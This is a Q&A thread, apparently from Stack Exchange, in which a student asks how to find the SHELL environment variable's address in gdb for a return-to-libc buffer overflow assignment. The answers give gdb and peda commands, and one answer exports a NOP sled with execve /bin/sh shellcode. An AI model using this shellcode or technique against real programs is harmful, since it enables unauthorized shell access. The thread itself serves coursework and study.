15

I have to exploit a very simple buffer overflow in a vulnerable C++ program for an assignment and I am not being able to find the environment variable SHELL.

I have never worked with BoF before, and after reading lots of similar questions, posts, etc. I have this information (correct me if it's wrong):

  • The program stores the environment variables in a global variable called environ

  • I can find the address of this variable like this:

    (gdb) info variable environ
All variables matching regular expression "environ":

Non-debugging symbols:
0xb7fd1b00  __environ
0xb7fd1b00  _environ
0xb7fd1b00  environ

  • I need to find the /bin/bash string in that variable to launch a shell (I have already got the system and exit addresses, I only need the route to the shell). And here is where I don't know what to do. I have been reading gdb tutorials, but still nothing. x/s 0xb7fd1b00 does not output anything useful.

Gilles 'SO- stop being evil'
  • 50,912
  • 13
  • 120
  • 179
Palantir
  • 313
  • 2
  • 3
  • 7

4 Answers4

21

environ is a pointer to pointer, as it has the type char **environ.

You have to try something like:

(gdb) x/s *((char **)environ)
0xbffff688:      "SSH_AGENT_PID=2107"
(gdb) x/s *((char **)environ+1)
0xbffff69b:      "SHELL=/bin/bash"
Gilles 'SO- stop being evil'
  • 50,912
  • 13
  • 120
  • 179
J.D.
  • 278
  • 2
  • 4
  • That's it!! Thanks a lot :) I had managed to get the address just with `x/s environ` and TONS of "enter"s, but it wasn't very nice :P – Palantir Mar 28 '12 at 21:29
  • A lot easier to remember x/s *environ If you need to see multiple variables... x/5s *environ –  Jul 17 '14 at 02:47
  • I get "Cannot access memory at address ..." . Possible memory-read protection in RHEL 6 systems?? – Otheus Sep 05 '15 at 21:40
4
  • Environment variables are 16 bytes from the base pointer (%ebp).
  • Put a break point in the main function and do this,

(gdb) x/wx $ebp+0x10
0xffffd3f8: 0xffffd48c
(gdb) x/wx 0xffffd48c
0xffffd48c: 0xffffd67e
(gdb) x/s 0xffffd67e
0xffffd67e: "XDG_SEAT_PATH=/org/freedesktop/DisplayManager/Seat0"
(gdb) (gdb) x/wx 0xffffd48c+4
0xffffd490: 0xffffd6b2
(gdb) x/s 0xffffd6b2
0xffffd6b2: "XDG_CONFIG_DIRS=/etc/xdg/lubuntu:/etc/xdg/xdg-Lubuntu:/usr/share/upstart/xdg:/etc/xdg"

Refer this blog

h1dd3ntru7h
  • 41
  • 3
2

if you have peda installed for gdb, then you could simply type this in gdb:

gdb-peda$ searchmem SHELL

The output would show

Searching for 'SHELL' in: None ranges
Found 1 results, display max 1 items:
[stack] : 0xbffff540 ("SHELL=/bin/bash")
redgetan
  • 121
  • 5
0

Also you can use just "refsearch variable_name" if you have peda installed for gdb.

example:

First of all you should add variable (something like Shellcode) to environment.

(export Shellcode=$(python -c 'print "\x90"*100 +"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe1\x50\x89\xe2\xb0\x0b\xcd\x80"'))

Then open gdb with sample program, break main and run.

When the program pause on the breakpoint, you can search the environment address following command.

refsearch Shellcode

schroeder
  • 123,438
  • 55
  • 284
  • 319
user147694
  • 1